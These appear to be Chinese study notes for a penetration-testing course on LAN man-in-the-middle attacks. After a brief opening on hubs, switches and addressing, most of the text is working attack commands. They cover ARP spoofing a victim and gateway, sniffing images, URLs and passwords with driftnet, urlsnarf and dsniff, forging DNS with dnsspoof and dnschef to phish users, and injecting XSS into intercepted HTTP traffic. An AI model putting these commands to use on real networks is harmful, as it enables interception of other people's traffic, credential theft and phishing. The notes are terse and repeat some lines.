三层地址:IP 网络到网络
二层地址:MAC 主机到主机
交换机与HUB
- HUB属于一层设备,全端口转发(不安全,共享带宽)
- 交换机根据学习地址转发
密码嗅探
- 开启路由转发
- echo 1 > /proc/sys/net/ipv4/ip_forward
- arpspoof
arpspoof -t 192.168.1.101 -r 192.168.1.1
- 网络嗅探
- 查看流量中的图片
- driftnet -i eth0 -a -d tempdir
- 查看访问的url
- urlsnarf -i eth0
- 嗅探密码
- dsniff -i eth0 -m(自动解码传输协议)
- /usr/share/dsniff/dsniff.services
- dsniff -i eth0 -m(自动解码传输协议)
- dns欺骗,可以钓鱼(修改53端口的包)
- dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof/hosts
- 查看流量中的图片
DNS欺骗代理
搭建假的dns服务器
dnschef –fakeip=1.1.1.10 –fakedomains=www.google.com,www.youtube.com –interface 1.1.1.2 -q
将被害者DNS指向伪造的DNS服务器
中间人攻击
- 注入XSS
- 即使没有xss漏洞,也可以直接向http请求中注入xss攻击代码
- 一旦得手,影响范围巨大
- 如果中间人发生在运营商线路上,很难引起用户注意。
- Mitmf安装